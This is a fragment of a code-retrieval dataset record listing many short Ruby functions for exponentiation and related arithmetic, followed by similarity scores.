"def convert_base(number, base)\n \n exponents = []\n n = 0 # Exponent / number position\n\n # Find the appropriate exponent size larger than the number \n while number != 0\n # puts \"Current top number: #{number}\"\n # puts \"Current exponent value: #{n}\"\n running_total = 0\n if number < base ** n\n # puts \"Base ** n: #{base ** n}\" \n # puts \"If loop current number: #{number}\"\n running_total += base ** (n-1)\n # puts \"If loop running_total: #{running_total}\"\n number = number - running_total\n # puts \"If loop number after subtraction: #{number}\"\n if exponents[n-1].nil? then exponents[n-1] = 1 else exponents[n-1] += 1 end\n n = 0\n else\n n += 1\n end\n end\n\n exponents.inspect\n\nend",
"def power(curr_value, to_power)\n curr_value**to_power\nend",
"def power_digit_sum(base, exponent)\n # 1) calculate the power\n power = base ** exponent\n sum = 0\n\n # 2) convert to string to iterate each digit\n len = power.to_s.length\n for index in (0...len)\n # 3) convert back to number to calculate sum\n sum += power.to_s[index].to_i\n end\n\n # 4) return sum\n return sum\nend",
"def power(a, b)\n return a**b\nend",
"def exponent(a=1, x)\n\ta*(Math::E**x)\nend",
"def power(num1, num2)\n return num1**num2\nend",
"def power(num1, num2)\n return num1**num2\nend",
"def exp2(base, power)\n return 1 if power == 0\n half = exp2(base, power / 2)\n\n if power.even?\n half * half\n else\n # note that (power / 2) == ((power - 1) / 2) if power.odd?\n base * half * half\n end\nend",
"def power(a,b)\n a.to_i ** b.to_i\nend",
"def exp2(base, power)\n return 1 if power == 0\n\n half = exp2(base, power / 2)\n\n if power.even?\n half * half\n else\n # note that (power / 2) == ((power - 1) / 2) if power.odd?\n base * half * half\n end\nend",
"def rpower(n) end",
"def power_sig_exp(b, x)\n l10 = x / Math.log(10, b)\n log10_sig_exp(l10)\nend",
"def power(n1, n2)\n return n1**n2\nend",
"def exp_v_1(num, pow)\n return 1 if pow === 0\n return num * exp_v_1(num, pow - 1)\nend",
"def recursive_exponent_1(base, exponent)\n puts \"#{__method__} called\"\n return 1 if exponent.zero?\n base * recursive_exponent_1(base, exponent - 1)\nend",
"def power(nb1, nb2)\n return nb1 ** nb2\nend",
"def power(b, n)\n\n\t# b^n.to_i\n\n\tb ** n\n\nend",
"def decimal_base(n)\n 10**(n-1)\nend",
"def exponent\n e = @exp\n digs = @digits\n unless digs == 0\n e += digs.__decimal_digits_length_approx(false)\n end\n e\n end",
"def #power(a,b)\n\ta ** b\nend",
"def power (n1, n2)\n\tn = n1 ** n2\n\treturn n\nend",
"def power (*base_and_power)\n base_and_power.inject(:**)\nend",
"def power(n1, n2)\n n1 ** n2\nend",
"def exponentm(num_1,num_2)\n return num_1 ** num_2\nend",
"def exponent(b, n)\n return b if n == 1\n return 1 if n == 0\n if n >= 0\n exponent(b, n-1) * b\n else\n (1.0/b) * exponent(b, n+1)\n end\n end",
"def exp1(base, power)\n puts \"exp1\"\n return 1 if power == 0\n base * exp1(base, power - 1)\nend",
"def raise_to_power(x, y)\n #every shift left is like a * 2\n #11000\nend",
"def pow(a,b)\n power=1\n for i in 1..b\n power=power*a\n end\n return power\nend",
"def powers(base, limit)\n 0.upto(Math.log(limit)/Math.log(base)) {|x| yield base ** x}\nend",
"def exponent(b, n)\n return 1 if n == 0\n if n > 0\n b * exponent(b, n - 1)\n else\n 1.0/b * exponent(b, n + 1)\n end\nend",
"def exponent(b, n)\n return 1 if n == 0\n if n > 0\n b * exponent(b, n - 1)\n else\n 1.0/b * exponent(b, n + 1)\n end\nend",
"def exponent(b, n)\n return 1 if n == 0\n\n if n > 0\n b * exponent(b, n - 1)\n else\n 1.0/b * exponent(b, n + 1)\n end\nend",
"def exp2(base, num)\n return 1 if num == 0\n return base if num == 1\n if num % 2 == 0\n expo = exp(base, num/2)\n else\n expo = exp(base, (num-1)/2)\n end\nend",
"def exp_ver_two(base, exponent)\n return 1 if exponent.zero?\n\n if exponent.even?\n n = exp_ver_two(base, exponent / 2)\n n * n\n else\n n = exp_ver_two(base, (exponent - 1) / 2)\n base * (n * n)\n end\nend",
"def power(n1, n2)\r\n n1.to_i ** n2.to_i\r\nend",
"def exp1(num, exponent)\n return 1 if exponent == 0\n # return ( 1 / exp1(num, exponent - 1) )\n\n num * exp1(num, exponent - 1)\nend",
"def exponent(a, b)\n return 1 if b.zero?\n\n array_of_values = []\n\n b.abs.times do\n array_of_values.push(a)\n end\n\n calculated_multiplier = array_of_values.reduce(:*)\n\n b > 0 ? calculated_multiplier : \"1/#{calculated_multiplier}\"\nend",
"def mod_pow(base, power, mod)\n result = 1\n while power > 0\n result = (result * base) % mod if power & 1 == 1\n base = (base * base) % mod\n power >>= 1;\n end\n result\nend",
"def power(num,pow)\n if pow == 0\n num\n else\n total = 1\n count = 0\n while count < pow\n total *= num\n count += 1\n end\n return total\n end\nend"
] |
[
"0.85367644",
"0.83835316",
"0.8346648",
"0.8328984",
"0.8320955",
"0.8299144",
"0.8173997",
"0.8119814",
"0.8064917",
"0.80615014",
"0.799997",
"0.79420173",
"0.7905454",
"0.7864293",
"0.7832552",
"0.78028375",
"0.77335674",
"0.7729772",
"0.7720525",
"0.7629144",
"0.7587631",
"0.75224316",
"0.75220996",
"0.75104916",
"0.74336636",
"0.74177545",
"0.7401962",
"0.7397249",
"0.736385",
"0.73291665",
"0.72643876",
"0.72304845",
"0.71569663",
"0.714212",
"0.71367276",
"0.7129801",
"0.7096157",
"0.70761293",
"0.70541507",
"0.70501876",
"0.70473546",
"0.7017277",
"0.70104784",
"0.6984732",
"0.6979316",
"0.6951182",
"0.69080687",
"0.69079345",
"0.68879896",
"0.68791616",
"0.68706334",
"0.68472624",
"0.6836052",
"0.68211895",
"0.6754527",
"0.6754527",
"0.6754527",
"0.6745633",
"0.67150277",
"0.66815716",
"0.66730875",
"0.66675776",
"0.66622806",
"0.66495657",
"0.66445374",
"0.6614588",
"0.66090333",
"0.66090333",
"0.6604281",
"0.65640855",
"0.65514517",
"0.6527223",
"0.652515",
"0.65214735",
"0.651822",
"0.6510254",
"0.64997405",
"0.64807075",
"0.64768535",
"0.64732736",
"0.6467741",
"0.64591914",
"0.6451282",
"0.64423007",
"0.6422822",
"0.64188904",
"0.6417424",
"0.64010173",
"0.6400539",
"0.6399776",
"0.6393711",
"0.6393711",
"0.6392004",
"0.63825274",
"0.638084",
"0.63638693",
"0.63609284",
"0.6346483",
"0.6342369",
"0.63287675"
] |
0.80038184
|
10
|
Write a method, sum which takes an array of numbers and returns the sum of the numbers.
|
def sum(array)
  total = 0
  array.each do |number|
    total += number
  end
  total
end
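For reference, a brief usage sketch of the method above; the sample arrays are illustrative assumptions, and the Array#sum call shown alongside is Ruby's built-in equivalent:

sum([1, 2, 3, 4])  # => 10
sum([])            # => 0 (the accumulator starts at 0, so an empty array sums to 0)

# idiomatic one-liner with the same result:
[1, 2, 3, 4].sum   # => 10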
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def sum_array(numbers)\n return numbers.sum()\nend",
"def sum_array(array)\n array.sum\nend",
"def sum_array(array)\n array.sum\nend",
"def sum(array)\n array.sum\nend",
"def sum(array_of_integers)\n # TODO\nend",
"def sum_array(array)\n the_sum_of_array = array.sum\n the_sum_of_array\nend",
"def sum(array)\n\tarray.reduce(:+)\nend",
"def sum_array(array)\n array.reduce(:+)\nend",
"def sum_array(array)\n sum = 0\n\n array.each do |number|\n sum += number\n end\n\n return sum\nend",
"def sum(array)\n\treturn array.reduce(:+)\nend",
"def sum_array(array)\n sum = 0\n array.each do |number|\n sum += number\n end\n sum\nend",
"def sum_array(array)\n sum = 0\n array.each do |num|\n sum = sum + num\n end\n sum\nend",
"def array_sum(arr)\n arr.reduce(:+)\nend",
"def array_sum(arr)\n arr.reduce(:+)\nend",
"def sum_array(array)\n return array.sum\n\n # sum_total_of_array = 0\n # for number in array\n # sum_total_of_array += number\n # end\n # return sum_total_of_array\nend",
"def sum_array(array)\n sum = 0\n array.each do |x|\n sum += x\n end\n return sum\nend",
"def sum_array(array)\n # Your code here\nend",
"def sum_array(array)\n sum = 0\n array.each do |num|\n sum += num\n end\n sum\nend",
"def sum array\n\tsum = 0\n\tarray.each do |number|\n\t\tsum = sum + number\n\tend\n\tsum\nend",
"def array_sum(arr)\n arr.reduce(:+)\n\nend",
"def sum_array(array_num)\n\nend",
"def sum_array(integers)\n integers.sum\nend",
"def sum_array(array)\n sum = 0\n array.each{ |num| sum += num }\n sum\nend",
"def sum_array(array)\n sum = 0\n array.each do |value|\n sum += value\n end\n sum\nend",
"def sum_array(array)\n\tarray.inject { |sum, n| sum + n }\nend",
"def sum(array)\n sum = 0\n\n array.each { |number|\n sum += number\n }\n\n return sum\nend",
"def sum_array(array)\n\tarray.inject do |sum, n| sum + n\n\tend\nend",
"def sum_of_sums(array)\r\nend",
"def sum_array(array)\n total = 0\n array.each do |num|\n total += num\n end\n total\nend",
"def sum_array(array)\n sum = 0\n array.each do |num|\n sum+=num\n end\n sum\nend",
"def sum(array)\n\ttotal = 0\n\tfor number in array #could do each do instead of for loop\n\t\ttotal += number\n\tend\n\treturn total\nend",
"def sum_array(array)\n sum = 0\n array.each do |element|\n sum += element\n end\n sum\nend",
"def sum(array)\n sum = 0\n array.each do |num|\n sum += num\n end\n sum\nend",
"def sum(array)\n sum = 0\n array.each do |a|\n sum += a\n end\n return sum\nend",
"def total(array)\n array.sum\nend",
"def array_sum(arr)\n arr.reduce(0, :+)\nend",
"def array_sum(arr)\n arr.reduce(0, :+)\nend",
"def array_sum(arr)\n arr.reduce(0, :+)\nend",
"def sum arr\n #this is slightly too easy...\n arr.sum\nend",
"def array_sum(arr)\n return arr.reduce(0, :+)\nend",
"def sum arr\n sum = arr.sum\n return sum\nend",
"def sum_array(int_array)\n int_array.reduce(:+)\nend",
"def my_sum(array)\n sum = 0\n array.each do |num|\n sum += num\n end\n sum\nend",
"def sum_array(array)\n sum = 0\n array.each do |i|\n sum+=i\n end\n sum\nend",
"def sum_array(numbers)\n total = 0\n for number in numbers\n total = total + number\n end\n return total\nend",
"def sum(array)\n array.inject(0){|sum, n| sum + n}\n end",
"def array_sum(array)\r\n array.inject(0, :+)\r\nend",
"def sum1(array)\r\n sum = 0\r\n array.each do |number|\r\n sum += number\r\n end\r\n sum\r\nend",
"def simple_array_sum arr\n arr.reduce(:+)\n end",
"def sum(array)\n sum = 0\n array.each { |n| sum += n } \n sum\nend",
"def sum(array)\n array.map(&:to_i).reduce(0, :+)\nend",
"def simpleArraySum(ar)\n ar.sum\nend",
"def it_arr_sum(array)\r\n sum = 0\r\n array.each {|ele| sum += ele}\r\n return sum\r\nend",
"def simpleArraySum(ar)\n ar.sum\nend",
"def sum(array)\n array.reduce(0) {|sum, num| sum += num}\nend",
"def sum_array(any_array)\n any_array.inject(:+)\n end",
"def sum_of_sums(array)\n sum = 0\n sum_array = array.map { |x| sum += x }\n sum_array.inject(:+)\nend",
"def sum (array)\n y=array.inject(:+).to_i\nend",
"def sum(array)\n return array.inject(0, &:+)\nend",
"def array_sum(arr)\n\n sum = 0\n arr.each {|n| sum += n}\n\n sum\nend",
"def sum_array( numbers )\r\n numbers.inject(0, :+)\r\nend",
"def sum_array(array)\n array.inject { |sum,n| sum + n }\nend",
"def simpleArraySum(ar)\n return ar.map(&:to_i).sum\nend",
"def total (array)\n sum = 0\n array.each do |i|\n sum + i\n end\n return sum\nend",
"def arr_sum(array)\n sum = 0 # Declares initial value for variable 'sum' as 0\n array.each do |i| # Begin iterating each item of arr\n sum += i # add each number in array to the next item, continue until items exhausted\n end\n return sum # Returns new sum value\nend",
"def array_sum(arr)\n arr.reduce(0) {|sum, el| sum + el}\nend",
"def sum_array(array)\n array.inject { |sum, x| sum + x }\nend",
"def sum(array)\n\tanswer = 0\n\tif array.length > 0 then\n\t\tarray.each {|x| answer += x}\n\telse\n\t\treturn 0\n\tend\n\treturn answer\nend",
"def sum (arr)\n\treturn arr.inject(0, :+)\nend",
"def total(array)\n sum = 0\n array.each do |x|\n sum = sum + x\n end\n sum\nend",
"def sum(arr)\n arr.inject(:+)\nend",
"def sum(theArray)\n\ttotal = 0\n\ttheArray.each do |i|\n\t\ttotal = total + i\n\tend\n\treturn total\nend",
"def add_array_numbers(array)\n result = array.sum\n # .sum cannot be used on a string, only integars and floats\n return result\nend",
"def total(array)\n sum = 0\n array.each do |number|\n sum = sum += number\n end\n sum\nend",
"def sum(array)\n s = 0\n\tarray.each {|x| s+= x}\n\ts\nend",
"def sum(array)\n return 0 if array.empty?\n array.inject(:+)\nend",
"def sumArray(array)\n sum = 0\n array.each do\n |n|\n sum += n.to_i\n end\n puts \"Somme : #{sum}\"\nend",
"def total(array_of_numbers)\n sum = 0\n array_of_numbers.each do |num|\n sum += num\n end\n return sum\nend",
"def sum(array)\n array.inject(0, :+)\nend",
"def total(array)\n sum = array.inject(:+)\n sum\nend",
"def sum_array(array)\n array.inject do |sum, n|\n sum + n\n end\nend",
"def array_sum(arr)\n\tsum = 0\n\n\t# an for each loop\n\tfor i in arr\n\t\tsum += i\n\tend\n\t\n\treturn sum\n\t\nend",
"def total(array)\n sum = 0\n array.each do |num|\n sum += num\n end\n return sum\nend",
"def sum_array(array)\n #array.inject(0){|sum,x| sum + x }\n array.inject(0){|sum,x| sum + x }\nend",
"def sum(in_array)\n return 0 if in_array.length == 0\n return in_array.reduce(:+)\nend",
"def total(array_of_numbers)\n return array_of_numbers.reduce(:+)\nend",
"def sum(array)\n array.reduce(0) {|base, ele|\n base+=ele\n }\n end",
"def sum arr\n # YOUR CODE HERE\n total = arr.sum\n \n return total\nend",
"def total(array)\n sum = 0\n array.each do |n|\n sum += n\n end\n sum\nend",
"def total(array)\n\tsum = 0\n\tarray.each do |x|\n\t\tsum = sum + x\n\tend\n\tsum\nend",
"def sum_array(array)\nsum = 0\n for i in 0..array.length-1\n sum = sum+ array[i]\n end\n return sum\nend",
"def array_sum(arr)\n if arr.length == 0\n return 0\n end\n arr.reduce(:+)\nend",
"def sum(arr)\n arr.reduce(0, :+)\nend",
"def simpleArraySum(ar)\n #\n # Write your code here.\n #\n ar.reduce(&:+)\nend",
"def sum_array (arr)\n result = 0\n arr.each do |value|\n result +=value\n end\n result\nend",
"def array_sum(arr)\n return 0 if arr.empty?\n arr.reduce(:+)\nend",
"def array_sum(arr)\n return 0 if arr.empty?\n arr.reduce(:+)\nend",
"def array_sum(arr)\n return 0 if arr.empty?\n\n arr.reduce(&:+)\nend",
"def sum_of array\n# add the numbers of the array, these are three different ways I found\n array.inject{ |sum, value| sum += value}\n # or\n # array.map(&:to_i).reduce(0, :+)\n # or\n # array.sum\nend",
"def sum_upon_sums(array)\n\nend",
"def get_sum(array)\n return array.inject (0) { |sum, n| sum + n }\nend"
] |
[
"0.8819229",
"0.8741331",
"0.8724715",
"0.86748266",
"0.8614597",
"0.8563894",
"0.8530244",
"0.8503776",
"0.8475847",
"0.8460066",
"0.8451358",
"0.84347755",
"0.8431987",
"0.8431987",
"0.8431652",
"0.8411252",
"0.8402997",
"0.8394949",
"0.8384007",
"0.8373476",
"0.8366921",
"0.8359736",
"0.8351837",
"0.83495414",
"0.8342264",
"0.83414763",
"0.83398837",
"0.83290505",
"0.83187103",
"0.8310578",
"0.829937",
"0.8286785",
"0.8267415",
"0.82589245",
"0.8240244",
"0.8226852",
"0.8226852",
"0.8226852",
"0.8225501",
"0.82200336",
"0.8201339",
"0.8196485",
"0.81954306",
"0.8194395",
"0.8187479",
"0.81857574",
"0.81767964",
"0.81707084",
"0.81670696",
"0.8165828",
"0.8143491",
"0.81394327",
"0.8136113",
"0.8134763",
"0.811536",
"0.8111239",
"0.81080866",
"0.8106419",
"0.8106143",
"0.80964607",
"0.8082479",
"0.80794656",
"0.8061252",
"0.80586964",
"0.8054272",
"0.80536664",
"0.80504465",
"0.804762",
"0.8043209",
"0.8043035",
"0.8039686",
"0.80396193",
"0.8039078",
"0.802733",
"0.8022002",
"0.8019988",
"0.8004364",
"0.8002243",
"0.79936755",
"0.7990133",
"0.79874593",
"0.7986634",
"0.79810566",
"0.7978015",
"0.797607",
"0.7975226",
"0.79748225",
"0.7973657",
"0.7972487",
"0.795931",
"0.79570824",
"0.79463726",
"0.7943668",
"0.79418004",
"0.79396486",
"0.7934559",
"0.7934559",
"0.79344285",
"0.79203117",
"0.7919308",
"0.7916845"
] |
0.0
|
-1
|
Write a method, is_prime?, that takes a number num and returns true if it is prime and false otherwise.
|
def is_prime?(num)
  return false if num < 2 # 0, 1, and negatives are not prime
  i = 2
  while i < num
    if (num % i) == 0
      return false
    end
    i += 1
  end
  true
end
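A short usage sketch for the method above (inputs are illustrative), followed by a common refinement that is an assumption on my part rather than part of the original answer: trial division only needs to test divisors up to the square root of num.

is_prime?(2)   # => true
is_prime?(9)   # => false
is_prime?(1)   # => false (handled by the guard clause)

# hypothetical sqrt-bounded variant (not from the source):
def is_prime_fast?(num)
  return false if num < 2
  (2..Math.sqrt(num)).none? { |i| (num % i).zero? }
end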
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def is_prime?(num)\nend",
"def is_prime?(num)\n\treturn false if (num < 1 || num.class == Float)\n\t(2...num).each { |n| return false if num % n == 0 }\n\ttrue\nend",
"def is_prime?(num)\n # Write your code here\nend",
"def is_prime?(num)\n\nend",
"def isPrime?(num)\n\treturn false if num <= 1\n\n\ti = 2\n\twhile i < num\n\t\treturn false if num % i == 0\n\t\ti += 1\n\tend\n\treturn true\nend",
"def is_prime?(num)\n\t\t return false if num <= 1\n\t\t maxfactor = Math.sqrt(num).to_i\n\t\t (2..maxfactor).each {|i| return false if num % i == 0}\n\t\t true\n\t\tend",
"def is_prime?(num)\n ('1' * num) !~ /^1?$|^(11+?)\\1+$/\n end",
"def is_prime?(num)\n\tfor i in 2..Math.sqrt(num)\n\t\tif num % i == 0\n\t\t\treturn false\n\t\tend\n\tend\n\treturn true\nend",
"def is_prime?(num)\n\tfor i in 2..Math.sqrt(num)\n\t\tif num % i == 0\n\t\t\treturn false\n\t\tend\n\tend\n\treturn true\nend",
"def is_prime?(num)\n return false if num < 2\n (2...num).none? { |factor| num % factor == 0 }\nend",
"def is_prime?(num)\n return false if num < 2\n (2...num).none? { |factor| num % factor == 0 }\nend",
"def is_prime?(num)\n return false if num < 2\n (2...num).none? { |factor| num % factor == 0 }\nend",
"def is_prime?(num)\n\t(2..Math.sqrt(num)).each do |target|\n\t\treturn false if num % target == 0\n\tend\n\treturn true\nend",
"def is_prime?(num)\n return if num <= 1\n (2..Math.sqrt(num)).none? { |i| (num % i).zero? }\nend",
"def prime?(n)\n\tPrime.prime?(n)\nend",
"def is_prime?(num)\n return true if num == 1\n (2...num).all? {|i| (num % i) != 0}\nend",
"def is_prime?(number)\n\nend",
"def is_prime?(number)\n\nend",
"def prime?(num)\n\treturn false if num == 1\n\t(2...num).each { |n| return false if num % n == 0 }\n\ttrue\nend",
"def is_prime(num)\n\tif num <= 1\n\t\treturn false\n\tend\n\tfor x in 2..Math.sqrt(num).floor do\n\t\tif num % x == 0\n\t\t\treturn false\n\t\tend\n\tend\n\t#If not divisible by anything, return the default case true because the number\n\t#therefore is prime\n\treturn true\nend",
"def is_prime?(num)\n (2...num).none? { |div| num % div == 0 }\nend",
"def prime? num\n return false if num < 2\n (2..Math.sqrt(num)).none? {|n| num % n == 0 }\n end",
"def is_prime?(num)\n return false if num == 1\n return true if num == 2 \n (2..Math.sqrt(num)+1).each do |x|\n return false if num%x == 0\n end\n true\nend",
"def prime?(num)\n\treturn false if num < 2\n\t\n\t(2...num).each do |i|\n\t\treturn false if num % i == 0\n\tend\n\ttrue\nend",
"def is_prime?(num)\n return false if num <2\n return (2..num/2).none? {|i| num%i==0}\nend",
"def prime?( number )\n self.class.prime? number\n end",
"def is_prime?(num)\n 2.upto(num-1) do |i|\n return false if num%i==0\n end\n true\nend",
"def is_prime(x)\n return true if x.prime? == true\n else false\nend",
"def is_prime?(num)\n if !num.is_a?(Integer) || ( num.class == Float && !num.nan? && num == num.floor ) || num <= 1\n false\n else\n (2...num).each do |i|\n if num % i == 0\n return false\n end\n end\n true\n end\nend",
"def is_prime?(n)\n end",
"def is_prime?(num)\n 2.upto(num / 2) do |n|\n return false if num % n == 0\n end\n true\nend",
"def prime?(num)\n\t(2 .. Math.sqrt(num)).each {|i| return false if num % i == 0}\n\treturn true\nend",
"def is_prime?(num)\n\tif num > 1\n\t\t(2..(num-1)).each do |i|\n \t\t\tif num % i == 0\n \t\t\t\treturn false\n \t\t\tend\n\t\tend\n\t\ttrue\n\telse\n\t\tfalse\n\tend\nend",
"def is_prime?(num)\n (2...num).each do |i|\n return false if num % i == 0\n end\n true\nend",
"def is_prime?(num)\n\n return false if num<2\n\n (2...num).none? {|factor| num%factor == 0}\n\nend",
"def is_prime?(num)\n (2...num).none? { |el| num % el == 0 }\nend",
"def is_prime?(num)\n (2...num).none? { |n| num % n == 0 }\nend",
"def is_prime?(num)\n\n return false if num <= 1\n return true if num == 2\n\n i = 2\n while i < num\n return false if num % i == 0\n i += 1\n end\n\n true\n\nend",
"def is_prime?(num)\n for i in (2..Math.sqrt(num))\n return false if num % i == 0\n end\n true\nend",
"def is_prime?(num)\n\tif num > 1\n\t\tmaxn = num**(0.5)\n\t\ti = 2\n\t\twhile i <= maxn\n \t\t\tif num % i === 0\n \t\t\t\treturn false\n \t\t\tend\n \t\t\ti = i+2\n\t\tend\n\t\ttrue\n\telse\n\t\tfalse\n\tend\nend",
"def is_prime?(num)\n (2...num).each {|el| return false if num % el == 0}\n true\nend",
"def is_prime?(num)\n (2...num).none? {|i| num % i == 0}\nend",
"def prime?(num)\n\t(2..Math.sqrt(num)).each do |x|\n\t\tif num % x == 0\n\t\t\treturn false\n\t\tend\n\tend\n\ttrue\nend",
"def prime?(num)\n if 0 == num or 1 == num\n return false\n else\n return (2..Math.sqrt(num)).all? { |x| num % x != 0}\n end\nend",
"def prime?(num)\n Math.sqrt(num).to_i.downto(2).each { |i| return false if (num % i).zero? }\n true\nend",
"def is_prime?(num)\n (2..num/2).none?{|el| num % el == 0}\nend",
"def is_prime?(num)\n return false if num < 2\n (2...num).each { |factor| return false if num % factor == 0}\n true\nend",
"def is_prime?\n return false if num <= 1\n Math.sqrt(num).to_i.downto(2).each {|i| return false if num % i == 0}\n true\nend",
"def prime?(num)\n\t(2..Math.sqrt(num)).each do |x|\n\t\tif num % x == 0\n\t\t\treturn false\n\t\tend\n\tend\n\treturn true\nend",
"def prime?(num)\n factors(num) == [1, num]\nend",
"def prime?(arg)\n Prime.prime?(arg)\nend",
"def is_prime?(num)\n (2...num).each do |el|\n return false if num % el == 0\n end\n true\nend",
"def prime?(int)\n \nend",
"def is_prime?(i)\r\n 2.upto(Math.sqrt(i).to_i) {|j|\r\n return false if i % j == 0\r\n }\r\n true\r\nend",
"def is_prime?(num)\n (2..num / 2).each do |n|\n return false if num % n == 0\n end\n true\nend",
"def is_prime?(num)\n (2...num).each do |factor|\n if num % factor == 0\n return false\n end\n end\n true\nend",
"def is_prime?(num)\n return false if num < 2\n (2...num).each do |i|\n return false if num%i == 0\n end\n return true\nend",
"def is_prime?(num)\n return false if num <= 1\n\n (2...num).each do |fact|\n return false if num % fact == 0\n end\n\n true\nend",
"def is_it_prime(num)\n \n\tif num == 100\n\t return \"This is not a prime number\"\n\telsif num <= 2 || num % num == 1 \n return \"This is not a prime number\"\n\telse\n return \"This is a prime number\"\n\tend \nend",
"def is_prime?(n)\n 2.upto(Math.sqrt(n).to_i) { |num| return false if n % num == 0 }\n n == 1 ? false : true\nend",
"def is_prime?(num)\n (2...num).each do |n|\n if num % n == 0\n return false\n end\n end\n true\nend",
"def ruby_prime(num)\n if num.prime? == true\n puts \"#{num} is prime.\"\n else puts \"#{num} is not prime.\"\n end\nend",
"def is_prime?(num)\n i = 2\n while i < num\n return false if num % i == 0\n i+=1\n end\n true\nend",
"def is_prime?(num)\n i = 2\n while i < num\n return false if num % i == 0\n i+=1\n end\n true\nend",
"def isprime?(num)\n\n return false if num<2\n\n (2...num).each do |factor|\n return false if num % factor == 0\n end\n\n return true\n\nend",
"def prime?(num)\n return false if num <= 1\n (2...num).none? { |i| num % i == 0 }\nend",
"def is_prime?(num)\n if !is_integer?(num)\n return false\n elsif num <= 1\n return false\n else\n (2..(num-1)).each do |el|\n if num % el == 0\n return false\n end\n end\n end\n return true\nend",
"def is_prime?(num)\n (2...num).each do |i|\n if num % i == 0\n return false\n end\n end\n num > 2\nend",
"def is_prime?(num)\n for i in (2...num/2)\n if num % i == 0\n return false\n end\n end\n return true\nend",
"def is_prime?(num)\n return 2 if num == 2\n (2...num).each do |n|\n return false if num % n == 0\n end\n true\nend",
"def is_prime?(num)\n (2..(num/2)).each { |divisor| return false if num % divisor == 0 }\n true\nend",
"def is_prime?(num)\n (2..(num - 1)).each do |divisor|\n return false if num % divisor == 0\n end\n\n true\nend",
"def is_prime?(num)\n (2..num-1).each do |x|\n return false if num % x == 0\n end\n true\nend",
"def is_prime?(num)\r\n (2..(num ** 0.5).to_i).each {|factor| return false if num % factor == 0 && num != factor} # no need to check above square root\r\n true\r\nend",
"def is_prime?(num)\n return true if num == 1 || num == 2\n return false if num % 2 == 0\n int = 3\n while int <= Math::sqrt(num)\n return false if num % int == 0\n int += 2\n end\n true\nend",
"def prime?\n Prime.prime?(self)\n end",
"def prime?(num) \n return false if num < 2\n (2...num).none? { |factor| num % factor == 0}\nend",
"def is_prime_number(num)\n (2...num).all? {|n| num % n != 0}# has factors\nend",
"def prime?(num)\r\n if num <= 1 || num == 0 || num == 1\r\n return false\r\n elsif \r\n (2..num - 1).each do |i| \r\n if num % i == 0 \r\n return false \r\n end \r\n end \r\n end \r\n true \r\n end",
"def is_prime?(num)\n return false if num.even?\n for i in (2..((num/2.round) + 1))\n return false if num % i == 0\n end\n return true\nend",
"def is_prime?(num)\n return false if num.even?\n for i in (2..((num/2.round) + 1))\n return false if num % i == 0\n end\n return true\nend",
"def prime?(num)\n return false if num < 2\n (2...num).none? { |fact| num % fact == 0 }\nend",
"def prime?(num)\n return false if num < 2\n (2...num).none? { |fact| num % fact == 0 }\nend",
"def is_prime?(num)\n Math.sqrt(num).floor.downto(2).each do |i|\n false if num % i == 0\n end\n true\nend",
"def is_prime?\r\n\t#Your code here\r\nend",
"def prime?(num)\n return false if num == 1\n return true if num == 2\n (2...num).each do |divisor|\n return false if num % divisor == 0\n end\n true\nend",
"def is_prime(num)\n return false if num <= 1\n Math.sqrt(num).to_i.downto(2).each {|i| return false if num % i == 0}\n return true\nend",
"def prime?(num)\n if num == 2\n true\n elsif num > 1 && num % num == 0 && num % 1 == 0 && !(2 .. (num - 1)).to_a.any?{|number| num % number == 0}\n true\n else\n false\n end\nend",
"def is_prime?(num)\n return false if num < 2\n \n (2...num).each do |i|\n return false if num % i == 0\n end\n true\nend",
"def prime?(num)\n\tif num < 2\n\t\treturn false\n\tend\n \n \t(2...num).each do |factor|\n \tif num % factor == 0\n \treturn false\n end\n end\n \n \treturn true\nend",
"def is_prime?(num)\n return false if num <= 1\n\n idx = 2\n while idx < num\n if num % idx == 0\n return false\n end\n idx += 1\n end\n\n true\nend",
"def is_prime?(num)\n return false if num < 2\n (2...num).each do |i|\n if num % i == 0\n return false\n end\n end\n return true\nend",
"def is_prime?(num)\n return false if num < 2\n (2...num).each do |i|\n if num % i == 0\n return false\n end\n end\n return true\nend",
"def is_prime?(num)\n return false if num < 2\n\n (2...num).each do |i|\n return false if num % i == 0\n end\n true \nend",
"def isPrime(num)\n return false if num < 2\n\n sqrt_num = Math.sqrt(num).floor\n 2.upto(sqrt_num){|i|\n if num % i == 0\n return false # 割り切れたら素数でない\n end\n }\n return true\nend",
"def is_prime?(number)\r\n (2...number).each do |n|\r\n return false if number % n == 0\r\n end\r\n true\r\nend",
"def prime?(num)\n return false if num < 2\n (2...num).none? { |i| num % i == 0 }\nend",
"def is_prime(num)\n (2..num**0.5).each { |i| return false if num % i == 0 }\n true\nend",
"def is_prime(num)\n\tdivisor = 2\n\twhile divisor < num\n\t\tif num%divisor == 0\n\t\t\treturn false\n\t\tend\n\t\tdivisor += 1\n\tend\n\treturn true\nend",
"def is_prime?(number)\n remainders = (2...number).map { |d| number % d}\n !remainders.include?(0) && number > 1\nend",
"def prime?(num)\n return false if num == 1\n (2...num).each do |number|\n return false if num % number == 0\n end\n return true\nend"
] |
[
"0.8312177",
"0.8139957",
"0.8124352",
"0.81223184",
"0.80209494",
"0.79551506",
"0.79307765",
"0.79305464",
"0.79305464",
"0.79105973",
"0.79105973",
"0.79105973",
"0.78970796",
"0.7890389",
"0.7881669",
"0.7873143",
"0.7869361",
"0.7869361",
"0.78663236",
"0.785429",
"0.78449035",
"0.7834881",
"0.78160644",
"0.7810488",
"0.78102636",
"0.779848",
"0.77936715",
"0.77908933",
"0.7788586",
"0.77837455",
"0.77774704",
"0.77735406",
"0.777193",
"0.77662456",
"0.7763563",
"0.77611834",
"0.77562815",
"0.7752469",
"0.7752171",
"0.77501136",
"0.77456015",
"0.7742495",
"0.7736771",
"0.7727357",
"0.77272725",
"0.77271396",
"0.7723838",
"0.77157587",
"0.7714062",
"0.7710957",
"0.77086574",
"0.7705166",
"0.76778424",
"0.767051",
"0.7661802",
"0.7656798",
"0.76511586",
"0.7650099",
"0.76492745",
"0.76415217",
"0.7623114",
"0.76217455",
"0.7619046",
"0.7619046",
"0.7618185",
"0.76168364",
"0.7613472",
"0.76104856",
"0.76100796",
"0.7607234",
"0.76045877",
"0.76026106",
"0.75908",
"0.75872",
"0.7586252",
"0.7581753",
"0.7577654",
"0.7574202",
"0.75542736",
"0.75531805",
"0.75531805",
"0.7553104",
"0.7553104",
"0.7548622",
"0.7536669",
"0.75357413",
"0.7532435",
